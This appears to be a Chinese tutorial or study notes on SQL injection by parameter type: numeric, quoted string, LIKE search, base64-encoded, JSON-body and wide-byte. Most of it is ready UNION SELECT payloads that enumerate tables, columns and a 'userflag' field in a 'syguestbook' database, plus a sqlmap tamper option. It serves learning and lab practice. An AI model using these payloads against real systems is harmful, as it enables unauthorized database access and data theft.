赞
踩
数据类型注入
id:故事 普通的web喵
1/前台页面输入的参数是「数字」,比如下面这个根据ID查询用户的功能。
id=-1 UNION SELECT database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
前台页面输入的参数是「字符串」。
不加引号他会把他当成个变量而不是字符进行匹配
SELECT * FROM sy_guestbook WHERE gLogo="tpl/guestbook/default/images/logo.jpg";
字符可以使用单引号包裹,也可以使用双引号包裹,根据包裹字符串的「引号」不同,字符型注入可以分为:「单引号字符型」注入和「双引号字符型」注入,黑盒单引号,双引号都有尝试。
查询的过程有通倍符
search=aaa%' UNION SELECT database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '%'='
base=LTEgVU5JT04gU0VMRUNUIGRhdGFiYXNlKCksMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3
1、解码后带入数据库进行SQ语句的执行。
2、在注入的时候,我们要尝试对payload进行编码提交。
POST:json={“username”:“admin”} (键值对)
$sql="SELECT * FROM users WHERE username='{$username}'";
也就是说我们只需要闭合单引号就可以了
注入语句:
json={“username”:“admin’ order by 3#”}
json={“username”:“-admin’ union select 1,2,3#”}
gtpl=simple' UNION SELECT database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
gtpl=-simple' UNION SELECT group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='syguestbook'--+
gtpl=-simple' UNION SELECT group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_schema='syguestbook' and table_name='users'--+
gtpl=-simple' UNION SELECT group_concat(userflag),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users--+
汉字站用两个字节使得 / 无法出现
宽字节用sqlmap注入 参数:–tamper unmagicquotes.py
https://www.cnblogs.com/bmjoker/p/9326258.html
###学习交流的可以加Q群:622816049
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。